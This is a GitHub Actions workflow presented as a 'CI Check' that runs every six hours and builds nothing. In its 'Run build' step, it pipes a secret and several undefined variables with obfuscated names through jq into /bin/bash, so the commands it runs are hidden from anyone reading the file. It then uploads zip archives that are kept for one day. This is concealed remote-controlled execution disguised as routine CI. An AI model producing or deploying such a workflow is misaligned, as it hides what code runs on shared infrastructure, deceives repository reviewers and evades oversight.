name: CI Check
on:
  workflow_dispatch:

  schedule:
    - cron: '6 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          hi1934: ${{ secrets.hi1934 }}
        run: |
          printf '%s' "$hi1934" | jq -r .y66 | /bin/bash
          printf '%s' "$iri304" | jq -r .defle410 | /bin/bash
          echo $zcs8572 | jq -r .eoxr038 | /bin/bash
          printf '%s' "$ggrz3" | jq -r .yw1091 | /bin/bash
          echo $g244 | jq -r .qy81546 | /bin/bash
          echo $wkqv8452 | jq -r .zmye27494 | /bin/bash
          printf '%s' "$vhzd0570" | jq -r .m59 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: u9plmQhf
          path: "*.zip"
          retention-days: 1
